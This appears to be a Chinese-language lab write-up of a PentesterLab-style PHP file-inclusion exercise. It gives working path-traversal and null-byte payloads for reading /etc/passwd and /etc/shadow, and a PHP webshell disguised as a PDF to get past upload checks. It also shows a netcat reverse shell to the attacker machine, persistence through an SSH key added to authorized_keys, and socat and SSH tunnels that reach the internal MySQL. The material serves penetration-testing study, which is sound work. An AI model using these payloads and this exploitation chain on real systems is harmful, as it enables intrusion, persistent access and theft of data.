References

Writeup

Detection of PHP include

  • 插入不存在的路徑,看是否出現錯誤訊息,從錯誤訊息可看出檔名後面會被加上.php
    • http://10.0.2.140/index.php?page=pentesterlab123randomvalue
  • 這時插入路徑檔名,並在最後面加上null byte%00,以消除檔名後面自動加上的.php
    • http://10.0.2.140/index.php?page=../../../../../etc/shadow%00
    • 可以看見讀到shadow檔案了,只是權限不夠而已(Permission denied)
  • 讀/etc/passwd檔:http://10.0.2.140/index.php?page=../../../../../etc/passwd%00
  • 將string改為array
    • http://10.0.2.140/index.php?page[]=login
  • 測試Remote file inclusion,可發現RFI功能是disable的,所以無法看到google頁面
    • http://10.0.2.140/index.php?page=http://www.google.com/?
  • 因此,這網站有:
    • Local file include;
    • 副檔名.php會被加在送出的值後面

Exploitation of remote file include

  • webshell.txt
    <?php
system($_GET["cmd"]);
?>
  • http://10.0.2.140/index.php?page=http://10.0.2.130/webshell.txt&cmd=ifconfig
  • 由於先前所述,RFI功能是disable的,所以無法成功

Exploitation of local file include

  • 嘗試上傳php code,首先要確認:
    • 是否檢查副檔名: 檔名可直接修改
    • 是否檢查content type: HTTP protocol的multipart message,可藉由proxy修改
  • 這題兩種限制都有,因此都需要修改,修改方式有:
    • 從原有PDF加上PHP payload (有時會因為某些字元關係導致無法正常運作)
    • 或建立新的PHP檔,看它看起來像PDF,進而bypass content-type check:
      • 首先查看pdf檔案格式,開頭包含了%PDF-1.5字樣(有些版本可能不同):
        root@kali:~/Downloads# head -1 40992.pdf
%PDF-1.5
      • 建立新的檔案,檔名為lfi.pdf,內容為:
        root@kali:~/Downloads# cat lfi.pdf
%PDF-1.5
<?php
system($_GET["cmd"]);
?>
      • 檢查content-type:
        root@kali:~/tools/80_HTTP/php# cat content-type-checker.php
<?php
echo mime_content_type('lfi.pdf') . "\n";
?>

        root@kali:~/tools/80_HTTP/php# php content-type-checker.php
application/pdf
  • 上傳並執行file include:
    • http://10.0.2.140/index.php?page=uploads/lfi.pdf%00&cmd=uname
    • 網頁回傳:%PDF-1.5 Linux

      Since PHP 5.3.4 you can't use the NULL byte trick to get rid of the extension when doing a local file include.

Post-Exploitation

  • 如果對方沒nc的話,需要上傳或直接在對方主機上下載(wget):
    • 上傳:
      • %PDF-1.5加到nc開頭,並存成nc.pdf
        $ echo "%PDF-" > pdfheader
$ cat pdfheader nc > nc.pdf
      • 上傳檔案
      • 從第二行取出內容存成nc
        tail -n +2 nc.pdf > nc
  • 執行reverse shell: 先在本地主機listen port: nc -lnvp 80

    Using sudo (or root privileges) allows us to bind the port 80, this port can't be bind as a normal user. The port 80 (HTTP) is less likely to be blocked. The following port can also be tried: 21, 53, 443.

  • 執行command from LFI:
    • http://10.0.2.140/index.php?page=uploads/lfi.pdf%00&cmd=nc%2010.0.2.133%2080%20-e%20/bin/bash
      root@kali:~/tools/80_HTTP/php# nc -lnvp 80
listening on [any] 80 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.140] 47845
whoami
www-data
uname
Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

TCP redirection with socat

  • why socat?
  • 首先在本地端主機listen 443 port(因為80 port先前有在使用了),並轉發到2222 port
    sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr
  • 產生ssh key
    • ssh-keygen -P "" -f vulnerable
      • -P "": 代表空passphase
      • -f: 後面指定ssh key的檔名
  • 上傳ssh public key
    • 連入reverse shell
    • mkdir ~www-data/.ssh
    • echo "ssh-rsa AAAAB3Nz......tM/SQe19N8f9 attacker" >> ~/.ssh/authorized_keys
  • 接著在remote主機執行下列指令,這會讓remote主機將10.0.2.133:443流量轉發到它自己的22 port
    while true; do socat TCP4:10.0.2.133:443 TCP4:127.0.0.1:22 ; done
    • 執行過後,就可以將這個reverse shell的session關閉了

  • 最後連入本地端2222 port,這個port會接收443過來的流量,而remote主機已連上443,並轉發到它自己的22 port:

    • 示意圖: local (443轉發到2222) ------------- (reverse shell連到443流量轉發到22) remote

    • 所以local端連到2222 port,就等於連到remote的22 port了

      root@kali:~/Downloads# ssh localhost -p 2222 -l www-data -i vulnerable
Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan  8 06:42:57 2017 from localhost
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
      • 其中-l www-data:登入使用者身份。-i vulnerable為指定私鑰
  • 最後透過ssh,將remote mysql 127.0.0.1:3306綁到本地端的13306: 
    ssh localhost -p 2222 -l www-data -i vulnerable -L 13306:localhost:3306
    • 其中-L 13306:localhost:3306:13306為本地端listen的port,localhost:3306是remote端的mysql port
    • 接著就可以直接連到遠端mysql了:
      mysql -h localhost -u root -P 13306
    • 同樣也可以telnet看banner,因為我們已經在裡面了,所以只開本地端的127.0.0.1的服務也可以連:
      root@kali:~/Downloads# telnet localhost 13306
Trying ::1...
Connected to localhost.
Escape character is '^]'.
?
5.1.63-0+squeeze1T0mWKQ5Uw9QlO#_9<_MD

results matching ""

    No results matching ""